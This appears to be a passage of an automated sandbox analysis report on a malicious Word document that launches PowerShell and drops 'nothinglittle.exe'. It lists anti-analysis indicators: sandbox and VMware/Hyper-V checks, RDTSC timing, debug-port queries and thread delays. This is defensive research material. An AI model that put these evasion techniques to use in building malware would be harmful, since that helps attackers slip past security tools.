Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: RFL_PO 69002.doc

Stream path 'Data' entropy: 7.9926896989 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Code function: 28_2_00409A90 rdtsc

28_2_00409A90

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4580			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1329			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6660	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6168	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe TID: 4604	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Documents\nothinglittle.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: powershell.exe, 00000001.00000002.285192085.0000000005580000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp	Binary or memory string: 0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: powershell.exe, 00000001.00000002.285192085.0000000005580000.00000004.00000001.sdmp	Binary or memory string: d:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001D.00000000.456979386.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000001D.00000000.452020297.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000001D.00000000.457446382.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: nothinglittle.exe, 00000009.00000002.433940811.00000000031A1000.00000004.00000001.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: explorer.exe, 0000001D.00000000.452057636.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 0000001D.00000000.457920896.00000000088C3000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1SPS0
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000001D.00000000.457318859.000000000871F000.00000004.00000001.sdmp	Binary or memory string: e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&t
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: nothinglittle.exe, 00000009.00000002.436095929.0000000005740000.00000002.00000001.sdmp, explorer.exe, 0000001D.00000000.456709985.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe

Code function: 28_2_00409A90 rdtsc

28_2_00409A90

Source: C:\Users\Public\Documents\nothinglittle.exe

Code function: 9_2_03021120 LdrInitializeThunk,

9_2_03021120

Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120 mov eax, dword ptr fs:[00000030h]	28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120 mov eax, dword ptr fs:[00000030h]	28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120 mov eax, dword ptr fs:[00000030h]	28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120 mov eax, dword ptr fs:[00000030h]	28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012A4120 mov ecx, dword ptr fs:[00000030h]	28_2_012A4120
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01283138 mov ecx, dword ptr fs:[00000030h]	28_2_01283138
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B513A mov eax, dword ptr fs:[00000030h]	28_2_012B513A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B513A mov eax, dword ptr fs:[00000030h]	28_2_012B513A
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289100 mov eax, dword ptr fs:[00000030h]	28_2_01289100
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289100 mov eax, dword ptr fs:[00000030h]	28_2_01289100
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01289100 mov eax, dword ptr fs:[00000030h]	28_2_01289100
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01290100 mov eax, dword ptr fs:[00000030h]	28_2_01290100
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01290100 mov eax, dword ptr fs:[00000030h]	28_2_01290100
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01290100 mov eax, dword ptr fs:[00000030h]	28_2_01290100
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128B171 mov eax, dword ptr fs:[00000030h]	28_2_0128B171
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128B171 mov eax, dword ptr fs:[00000030h]	28_2_0128B171
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135F1B5 mov eax, dword ptr fs:[00000030h]	28_2_0135F1B5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0135F1B5 mov eax, dword ptr fs:[00000030h]	28_2_0135F1B5
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B61A0 mov eax, dword ptr fs:[00000030h]	28_2_012B61A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B61A0 mov eax, dword ptr fs:[00000030h]	28_2_012B61A0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013051BE mov eax, dword ptr fs:[00000030h]	28_2_013051BE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013051BE mov eax, dword ptr fs:[00000030h]	28_2_013051BE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013051BE mov eax, dword ptr fs:[00000030h]	28_2_013051BE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013051BE mov eax, dword ptr fs:[00000030h]	28_2_013051BE
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012961A7 mov eax, dword ptr fs:[00000030h]	28_2_012961A7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012961A7 mov eax, dword ptr fs:[00000030h]	28_2_012961A7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012961A7 mov eax, dword ptr fs:[00000030h]	28_2_012961A7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012961A7 mov eax, dword ptr fs:[00000030h]	28_2_012961A7
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AC182 mov eax, dword ptr fs:[00000030h]	28_2_012AC182
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012BA185 mov eax, dword ptr fs:[00000030h]	28_2_012BA185
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128519E mov eax, dword ptr fs:[00000030h]	28_2_0128519E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128519E mov ecx, dword ptr fs:[00000030h]	28_2_0128519E
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_01288190 mov ecx, dword ptr fs:[00000030h]	28_2_01288190
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012B4190 mov eax, dword ptr fs:[00000030h]	28_2_012B4190
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134A189 mov eax, dword ptr fs:[00000030h]	28_2_0134A189
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0134A189 mov ecx, dword ptr fs:[00000030h]	28_2_0134A189
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012AD1EF mov eax, dword ptr fs:[00000030h]	28_2_012AD1EF
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_012831E0 mov eax, dword ptr fs:[00000030h]	28_2_012831E0
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128B1E1 mov eax, dword ptr fs:[00000030h]	28_2_0128B1E1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128B1E1 mov eax, dword ptr fs:[00000030h]	28_2_0128B1E1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_0128B1E1 mov eax, dword ptr fs:[00000030h]	28_2_0128B1E1
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013141E8 mov eax, dword ptr fs:[00000030h]	28_2_013141E8
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]	28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]	28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]	28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]	28_2_013431DC
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe	Code function: 28_2_013431DC mov eax, dword ptr fs:[00000030h]	28_2_013431DC
